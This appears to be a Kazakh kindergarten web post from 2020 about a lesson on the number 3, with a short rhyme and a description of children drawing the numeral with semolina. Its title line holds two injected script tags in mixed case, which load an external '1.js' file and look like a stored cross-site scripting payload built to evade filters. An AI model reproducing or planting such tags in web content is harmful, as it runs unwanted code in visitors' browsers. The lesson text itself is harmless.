қызықты математика<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.11.2020
Екіліктен кейін қараңдар,
Үш саны шықты жарандар.
Үшінші орын тұрағы
Екі ілмектен тұрады.
№ 7 «Балапан» тобының балалары қарапайым математикалық ұғымдарды қалыптастыру оқу қызметінен 3 санымен танысты, суретін қағаз бетіне манканың көмегімен салып, санды дәптерге жазды. Бекіте келе сандарды жазумен қатар, манкамен басқа жаттығуларды ұсынуға болады, мысалы, еркін сурет салу немесе өрнектер, геометриялық фигуралар салу, сонымен қатар саусақпен ғана емес, таяқпен де сурет салу.



